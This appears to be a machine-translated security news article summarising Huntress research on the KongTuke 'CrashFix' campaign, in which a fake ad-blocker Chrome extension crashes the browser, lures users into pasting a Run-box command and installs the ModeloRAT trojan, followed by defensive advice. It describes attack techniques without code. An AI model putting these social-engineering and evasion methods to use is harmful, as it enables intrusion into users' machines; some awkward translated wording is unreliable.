KongTuke the campaign that turns a browser extension into a persistent remote access door

Recently, security researchers have uncovered a campaign that combines tuned social engineering and technical tricks to turn a browser extension into a door to persistent remote access. The findings, published by Huntress, describe an operation named KongTuke that used a malicious extension that pretended to be an advertising blocker, and that deliberately forced the browser to block to fool the user and get him to run commands with which he downloaded and deployed advanced malware.

The initial vector is surprisingly daily: someone is looking for an ad blocker, gets a malicious ad and ends up installing an extension from the official Chrome store that appears to be legitimate. The malicious piece identified by the researchers was called "NexShield - Advanced Web Guardian" and was designed to look almost identical to a legitimate version of uBlock Origin Lite, which made it easier for thousands of users to install it before it was removed.

The interesting thing from the technical point of view is how the extension turns the frustration of the user into the delivery mechanism of the second stage. After a period of intentional latency - the malicious load is activated with delay to avoid immediate detection - the extension shows a fraudulent alert that indicates that the browser has failed and offers a "repair scan." If the user follows the instructions, you are asked to open the Run Windows box and paste a command that is already on the clipboard. That command, far from being a harmless diagnostic utility, triggers a mechanism that causes extreme resource consumption in the browser: Runtime port connections are repeatedly created in an infinite loop until the browser becomes unstable and ends up collapsing.

The specific overload technique abuses the internal browser API to create an avalanche of runtime connections, which exhausts memory and CPU until it causes freezing and closing. Meanwhile, the extension implements a logic that detects the forced restart of the browser and reacts by showing the same fraudulent window in the next boot, thus feeding a loop where the same "solution" is offered over and over to already frustrated users. To learn more about the APIs that were abused, Chrome's extension documentation offers context on how runtime ports work: developer.chrome.com / docs / extensions / reference / runtime.

The campaign does not stay in trouble: there is a second malicious act. The extension sends a unique identifier to a server controlled by the attacker and, when certain conditions are met (the identifier exists, the server responds and the user has interacted with the popup), runs a command that uses a legitimate Windows utility to download the next stage from a remote direction. This command triggers a clear PowerShell chain with multiple layers of Base64 and XOR operations, which disfigures a payload capable of probing the team in search of analysis tools and virtualized environments. If you detect that the equipment is part of a business domain, the flow ends with the installation of a remote access Trojan written in Python, nicknamed ModeloRAT.

ModeloRAT incorporates RC4 encryption for communications with the command and control server, ensures persistence by modifying the Windows Registry and allows operators to run binaries, libraries, Python scripts and PowerShell commands. Your survey and communication behavior is designed to evade detection: under normal operation you use unusual intervals for "beaconing," but you can move to an active mode with very fast surveys when you receive the order. After repeated communication failures, malware reduces its pace to minimize noise and stay more steamy.

The technical details documented by Huntress show that the operators behind the traffic infrastructure - known in the community as KongTuke, 404 TDS or TAG-124 according to different reports - have a history of distributing payloads and "delivering" access to third parties, including Ransomware families. A prior analysis of this infrastructure and its associations with other groups was reported by intelligence firms, which underlines that it is not an isolated test but a distribution chain with clear operational objectives. For context on the activity of these distribution systems and their use by criminal actors, intelligence firms such as Recorded Future have published analyses on groups and TDS that facilitate this type of illicit trade (see Recorded Future).

As regards the persistence of the campaign and the technical defences: the extension incorporated anti-analysis measures, such as disable the context menu and blocking keyboard shortcuts to make it difficult for the user to open developer tools or inspect the code. In addition, the final load verifies hundreds of indicators of analysis environments and aborts if you find typical records of malware laboratories, which complicates the work of researchers. The infrastructure indicators and the files associated with the campaign were recorded on platforms such as VirusTotal for follow-up: nexsnield [.] com in VirusTotal.

Beyond technical explanation, there is a clear lesson about the human factor. This attack explores confidence in browser extensions and messages that appear to solve an immediate problem. By faking a known open source project and replicating its interface, attackers reduce alarm signals and increase the chances of the victim following the instructions.

What can users and companies do to reduce risk? First, distrust instructions that ask to run copied commands from a site or pop-up window: never paste or run commands that you have not checked. Review and manage installed extensions, eliminating any unknown element or not coming from a source of trust. For step-by-step help on how to remove extensions in Chrome, Google's official documentation offers clear indications: support.google.com / chrome / ansher / 187443. In corporate environments, extension management policies and centralized installation controls can prevent users from installing unauthorized supplements. It is also recommended that security teams verify outgoing connections and endpoints anomalies, and keep the antivirus and EDR solutions up-to-date to detect scripts execution patterns and persistence in the Register.

Finally, it is important to remember that attackers often use legitimate system tools to download and run payloads, using Windows-included utilities to dilute the malicious signal. A technical example of a utility used in this campaign is Microsoft's official reference to certain system commands, which you should know to understand how they can be misused: finger.exe in Microsoft documentation.

The KongTuke campaign and its CrashFix variant are a reminder that safety in navigation goes through a combination of individual digital hygiene and robust technical policies. The extensions are powerful and useful, but they also constitute an attack area that can be exploited very effectively when combined with well-executed psychological deception and already proven distribution infrastructures. Keeping informed, confirming sources and implementing technical controls are the best defences against such threats.

For a direct and technical reading of the report that motivated this analysis, Huntress's original research provides a complete breakdown of the attack chain and commitment indicators: Huntress - CrashFix / KongTuke. To contrast and expand context on associated actors and TDS it is appropriate to consult additional intelligence reports and technical repositories.